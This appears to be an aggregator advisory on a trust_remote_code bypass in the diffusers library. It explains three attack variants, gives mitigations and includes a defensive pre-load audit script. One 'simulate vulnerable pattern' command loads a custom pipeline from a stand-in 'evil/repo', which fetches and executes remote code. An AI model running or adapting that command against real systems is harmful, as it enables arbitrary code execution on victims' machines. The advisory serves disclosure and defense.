Diffusers, trust_remote_code Bypass, CVE(NA) (Critical)


How the mentioned CVE works:

The vulnerability is a `trust_remote_code` bypass in Hugging Face's `diffusers` library. Normally, `DiffusionPipeline.from_pretrained(..., trust_remote_code=False)` prevents loading remote Python files. However, the check was implemented inside `DiffusionPipeline.download()` instead of at the dynamic module load point, so any code path that skips `download()` also skips the security check. Three variants exist:
1. Cross-repo custom pipeline: Calling `from_pretrained('repoA', custom_pipeline='attacker/repoB', trust_remote_code=False)` evaluates the gate against repoA's file list, not repoB's. The attacker's `pipeline.py` from `repoB` executes.
2. Local snapshot + Hub custom pipeline: `from_pretrained('/local/snapshot', custom_pipeline='attacker/repoB', trust_remote_code=False)` takes the local-path branch, which never calls `download()`, so the gate is never reached. Remote code from `repoB` runs.
3. Local snapshot with custom components: `from_pretrained('/local/snapshot', trust_remote_code=False)` where the snapshot contains custom `.py` files (e.g., `unet/my_unet_model.py`) referenced in `model_index.json`. Again, `download()` is skipped and the custom code in the snapshot executes.
Root cause: The `trust_remote_code` gate was placed in the wrong function. All three variants lead to silent arbitrary code execution on the victim's machine. Fixed in diffusers 0.38.0 by moving the gate into `get_cached_module_file` in `dynamic_modules_utils.py`, the actual choke point for every dynamic module load.

dailycve form:

Platform: Python diffusers
Version: < 0.38.0
Vulnerability: trust_remote_code bypass
Severity: Critical
Date: 2024-10-XX

Prediction: Patch already available

Analytics under What Undercode Say:

```bash
# Check installed diffusers version
pip show diffusers | grep Version

# List all dynamic module load points (vulnerable before 0.38.0)
grep -r "get_cached_module_file" $(python -c "import diffusers, os; print(os.path.dirname(diffusers.__file__))") 2>/dev/null

# Simulate vulnerable pattern (do not run on production)
python -c "from diffusers import DiffusionPipeline; DiffusionPipeline.from_pretrained('/tmp/fake', custom_pipeline='evil/repo', trust_remote_code=False)"
```

How the Exploit Works:

An attacker hosts a Hub repo (e.g., `attacker/repoB`) containing a malicious `pipeline.py`. The victim runs `DiffusionPipeline.from_pretrained('trusted/repoA', custom_pipeline='attacker/repoB', trust_remote_code=False)`. The `trust_remote_code` check only validates `trusted/repoA`, not `attacker/repoB`, so `repoB/pipeline.py` is downloaded and executed, giving the attacker code execution on the victim's machine. Similarly, using a local snapshot (e.g., `/local/snapshot`) with `custom_pipeline` or with custom component `.py` files also bypasses the gate.

Protection from this CVE:

Upgrade to diffusers >= 0.38.0: `pip install --upgrade "diffusers>=0.38.0"`. If upgrading is impossible, only load pipelines from fully trusted sources; never pass `custom_pipeline` pointing to a Hub repo different from the main `pretrained_model_name_or_path`; and inspect local snapshots for unexpected `.py` files before loading. Note that these are only mitigations – the only complete fix is upgrading.
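The interim mitigations above, turned into a pre-load audit as an added example (not diffusers' own code): it refuses a `custom_pipeline` that names a repo other than the main model (variants 1 and 2) and flags `.py` files or custom-component entries in `model_index.json` inside a local snapshot (variant 3) before `from_pretrained()` is ever called. The `KNOWN_LIBRARIES` set and the constructed demo snapshot are assumptions for illustration.

```python
"""Pre-load audit for diffusers inputs (added example; not diffusers' own code).
Encodes the advisory's interim mitigations: refuse a custom_pipeline that names a
different repo than the main model, and flag .py files or custom-component entries
in model_index.json inside a local snapshot before from_pretrained() is called."""
import json
import tempfile
from pathlib import Path

# Assumption: libraries whose components diffusers resolves without importing snapshot code.
KNOWN_LIBRARIES = {"diffusers", "transformers"}


def custom_pipeline_allowed(pretrained_model_name_or_path, custom_pipeline):
    """Conservative policy: custom pipeline code may only come from the main repo itself."""
    return custom_pipeline is None or custom_pipeline == pretrained_model_name_or_path


def audit_snapshot(snapshot_dir):
    """Return human-readable findings; an empty list means nothing suspicious."""
    root = Path(snapshot_dir)
    findings = [f"python file in snapshot: {p.relative_to(root).as_posix()}"
                for p in sorted(root.rglob("*.py"))]
    index = root / "model_index.json"
    if index.is_file():
        for name, spec in json.loads(index.read_text()).items():
            # Component entries are ["library", "ClassName"]; metadata keys start with "_".
            if name.startswith("_") or not (isinstance(spec, list) and len(spec) == 2):
                continue
            library, cls = spec
            if library not in KNOWN_LIBRARIES:
                # An unknown library names a module file under the component folder
                # (e.g. unet/my_unet_model.py) that would be imported at load time.
                findings.append(f"custom component {name}: {library}.{cls}")
    return findings


def make_demo_snapshot(base_dir):
    """Write a constructed snapshot shaped like variant 3 (custom unet module)."""
    root = Path(base_dir)
    (root / "unet").mkdir(parents=True, exist_ok=True)
    (root / "unet" / "my_unet_model.py").write_text("# constructed custom component\n")
    index = {"_class_name": "StableDiffusionPipeline",
             "unet": ["my_unet_model", "MyUNetModel"],
             "vae": ["diffusers", "AutoencoderKL"]}
    (root / "model_index.json").write_text(json.dumps(index))
    return str(root)


def demo():
    """Audit a constructed snapshot in a temp dir and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_snapshot(make_demo_snapshot(tmp))
```

Run the audit and the `custom_pipeline_allowed` check before calling `from_pretrained()`, and refuse to load when either reports a problem.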

Impact:

Silent arbitrary code execution on any machine that calls `DiffusionPipeline.from_pretrained` with custom pipelines (or local snapshots containing custom components). Attackers can compromise models, steal data, install backdoors, or pivot to internal networks. All users of `diffusers` versions below 0.38.0 are affected.

Sources:

Reported By: github.com
Extra Source Hub: Undercode
